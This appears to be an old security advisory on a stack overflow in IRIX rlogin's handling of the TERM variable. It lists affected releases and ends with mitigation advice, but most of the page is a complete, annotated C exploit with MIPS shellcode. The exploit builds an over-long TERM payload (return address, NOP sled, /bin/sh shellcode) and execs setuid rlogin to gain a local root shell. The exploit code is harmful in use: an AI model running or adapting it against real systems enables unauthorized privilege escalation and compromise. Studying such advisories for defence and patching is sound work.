
Irix rlogin overflow vulnerability

COMMAND

    rlogin

SYSTEMS AFFECTED

    IRIX 5.2, 5.3, 6.2, 6.3

PROBLEM

    rlogin on the IRIX releases listed above copies the value of the TERM
    environment  variable  into a fixed-size stack buffer without checking
    its length.  An over-long TERM value therefore overwrites the saved
    return address on the stack; the exploit below fills it with a guessed
    return address, a NOP sled and MIPS shellcode that executes /bin/sh.
    Because rlogin runs with elevated privileges (it is normally installed
    setuid root), a local user who can execute the binary obtains a root
    shell.  No network access is required; "localhost" is only passed to
    satisfy rlogin's argument parsing.  Found by LSD (Last Stage of
    Delirium).

    /*## copyright LAST STAGE OF DELIRIUM oct 1997 poland        *://lsd-pl.net/ #*/
    /*## /usr/bsd/rlogin                                                         #*/

    /* Layout of the TERM= payload, in bytes, after the "TERM=" prefix:
     *   ADRNUM bytes  - the guessed return address repeated (one byte of
     *                   the 4-byte address per iteration, see main()),
     *   ALLIGN bytes  - 0xff padding so the sled and shellcode start on a
     *                   4-byte instruction boundary in rlogin's buffer,
     *   NOPNUM bytes  - the NOP sled,
     *   shellcode     - below.
     * 5 + ADRNUM + ALLIGN + NOPNUM + 43 (shellcode) + 1 (NUL) = 9991 bytes. */
    #define NOPNUM 4940
    #define ADRNUM 5000
    #define ALLIGN 2

    /* Position-independent MIPS shellcode.  "bltzal $zero" never takes the
     * branch ($zero is never negative) but always links, so $ra receives
     * the address two instructions past the start; "li $v0" sits in the
     * branch delay slot and runs regardless.  Every later address is then
     * formed relative to $ra: $a0 -> "/bin/sh" (offset 36), $a1 -> an
     * argv array { $a0, NULL } that the two sw stores build just past the
     * end of the shellcode in the victim's buffer, and the sb store writes
     * the NUL that terminates "/bin/sh" (offset 43).  The trap is made with
     * $v0 = 1011 -- presumably IRIX execve; confirm against the target
     * release's sys/syscall.h.  The array contains no 0x00 byte, which is
     * what lets main() measure it with strlen(). */
    char shellcode[]=
        "\x04\x10\xff\xff"    /* bltzal  $zero,<shellcode>    */
        "\x24\x02\x03\xf3"    /* li      $v0,1011             */
        "\x23\xff\x01\x14"    /* addi    $ra,$ra,276          */
        "\x23\xe4\xff\x08"    /* addi    $a0,$ra,-248         */
        "\x23\xe5\xff\x10"    /* addi    $a1,$ra,-240         */
        "\xaf\xe4\xff\x10"    /* sw      $a0,-240($ra)        */
        "\xaf\xe0\xff\x14"    /* sw      $zero,-236($ra)      */
        "\xa3\xe0\xff\x0f"    /* sb      $zero,-241($ra)      */
        "\x03\xff\xff\xcc"    /* syscall                      */
        "/bin/sh"
    ;

    /* Two-instruction stub that returns the caller's stack pointer in $v0.
     * main() casts this array to a function pointer and calls it to learn
     * where its own stack lives, then adds a fixed offset to guess where
     * rlogin's overflowed buffer will be.  Calling data as code only works
     * on a target whose stack/data pages are executable, as IRIX of this
     * era was; it is not portable C. */
    char jump[]=
        "\x03\xa0\x10\x25"    /* move    $v0,$sp              */
        "\x03\xe0\x00\x08"    /* jr      $ra                  */
    ;

    /* Four-byte filler repeated to form the NOP sled.  Not annotated in the
     * original; it appears to be "addiu $t7,$zero,0x1234", i.e. an
     * instruction that only writes a scratch register the shellcode never
     * reads, and which contains no 0x00 byte. */
    char nop[]="\x24\x0f\x12\x34";

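    /*
     * Build the TERM= payload ("TERM=" + ADRNUM address bytes + ALLIGN pad
     * + NOPNUM sled bytes + shellcode) in a local buffer and exec
     * /usr/bsd/rlogin with it as the only environment variable.
     *
     * argc/argv are unused.  On success the exec replaces this process and
     * main() never returns; it returns 1 if the payload would not fit in
     * the buffer or if the exec fails (the original exited silently in the
     * latter case, which made a missing or non-executable rlogin look like
     * a failed exploit).
     *
     * Changed from the original: the guessed address was stored with
     * "*(unsigned long*)adr = ..." into a char[4]; with a 64-bit long that
     * write overflows the array.  The address pattern is 4 bytes by design
     * (adr[i%4]), so the value is now truncated to a 32-bit word and its
     * bytes are taken in native byte order, which on the MIPS target is
     * big-endian, exactly as before.
     */
    int main(int argc,char **argv){
        char buffer[10000],*b,*envp[2];
        union { unsigned int word; char bytes[4]; } target;
        int i,shlen;

        (void)argc;
        (void)argv;

        printf("copyright LAST STAGE OF DELIRIUM oct 1997 poland  //lsd-pl.net/\n");
        /* The IP numbers in the banner are presumably the SGI processor
         * board types the fixed stack offsets below were tuned for. */
        printf("/usr/bsd/rlogin for irix 5.2 5.3 6.2 6.3 IP:17,19,20,21,22,32\n\n");

        /* jump[] is "move $v0,$sp; jr $ra": calling it returns our own
         * stack pointer.  The constant offset moves the guess into the
         * middle of the NOP sled as it will lie in rlogin's stack frame;
         * it is specific to the listed IRIX releases.  This executes data
         * as code and is not portable C. */
        target.word=(unsigned int)((*(unsigned long(*)())jump)()+10288+7000);

        shlen=(int)strlen(shellcode);

        /* Refuse to build a payload that would overrun buffer[] (5 is the
         * length of "TERM=", 1 is the terminating NUL).  With the shipped
         * constants this is 9991 bytes, so the check only matters if the
         * #defines or the shellcode are changed. */
        if(5+ADRNUM+ALLIGN+NOPNUM+shlen+1>(int)sizeof(buffer)){
            printf("payload does not fit in buffer\n");
            return 1;
        }

        envp[0]=buffer;
        envp[1]=0;

        b=buffer;
        sprintf(b,"TERM=");
        b+=5;
        for(i=0;i<ADRNUM;i++) *b++=target.bytes[i%4];   /* return address, repeated */
        for(i=0;i<ALLIGN;i++) *b++=0xff;                /* instruction alignment pad */
        for(i=0;i<NOPNUM;i++) *b++=nop[i%4];            /* NOP sled */
        for(i=0;i<shlen;i++) *b++=shellcode[i];         /* shellcode last, at the top of the sled */
        *b=0;

        /* Only the TERM variable is passed; the explicit (char*)0 ends the
         * argument list.  "localhost" just satisfies rlogin's usage. */
        execle("/usr/bsd/rlogin","rlogin","localhost",(char*)0,envp);

        /* Reached only if the exec failed. */
        printf("execle /usr/bsd/rlogin failed\n");
        return 1;
    }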

SOLUTION

    Fixed by the vendor.  This page gives no patch identifier; consult the
    SGI security advisories for the patch that applies to your IRIX
    release and install it.  Until the patch is applied, an effective
    interim measure is to strip the setuid bit from /usr/bsd/rlogin
    (chmod u-s), which removes the local root exposure at the cost of
    rlogin's privileged-port use, or to restrict execute permission on
    the binary to a trusted group.
